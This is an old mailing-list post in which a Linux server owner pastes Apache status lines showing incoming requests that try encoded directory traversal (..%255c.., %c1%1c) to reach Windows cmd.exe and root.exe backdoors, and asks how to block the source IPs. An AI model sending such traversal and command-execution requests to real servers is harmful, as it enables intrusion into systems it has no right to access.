[svlug] Is this a hack attempt?

Daevid Vincent daevid at daevid.com
Fri Oct 25 15:45:28 PDT 2002


I run RH8.0 so this sure seems suspicious to me:

1-0 25065 0/508/508 _  6.42 128 0 0.0 130.31 130.31  12.237.249.145
daevid.com GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0

4-0 25068 0/519/519 _  5.86 139 0 0.0 143.76 143.76  12.237.249.145
daevid.com GET /MSADC/root.exe?/c+dir HTTP/1.0 
5-0 25069 0/518/518 _  5.84 142 0 0.0 99.62 99.62  12.237.249.145
daevid.com GET /scripts/root.exe?/c+dir HTTP/1.0 
6-0 25070 0/531/531 _  6.44 114 0 0.0 129.48 129.48  12.237.249.145
daevid.com GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../.. 
7-0 25071 0/525/525 _  6.93 117 0 0.0 139.17 139.17  12.237.249.145
daevid.com GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd. 
8-0 25214 0/503/503 _  5.83 136 0 0.0 118.91 118.91  12.237.249.145
daevid.com GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0 
9-0 25774 0/271/271 _  4.87 133 0 0.0 119.94 119.94  12.237.249.145
daevid.com GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0 
10-0 26526 0/457/457 _  5.36 335 0 0.0 100.78 100.78  12.229.31.145
daevid.com GET /MSADC/root.exe?/c+dir HTTP/1.0 
14-0 26531 0/334/334 _  3.51 119 0 0.0 89.96 89.96  12.237.249.145
daevid.com GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd. 

And so now is there a way I can make a file of IP/domains that are
banned from contacting my server (all ports)?




More information about the svlug mailing list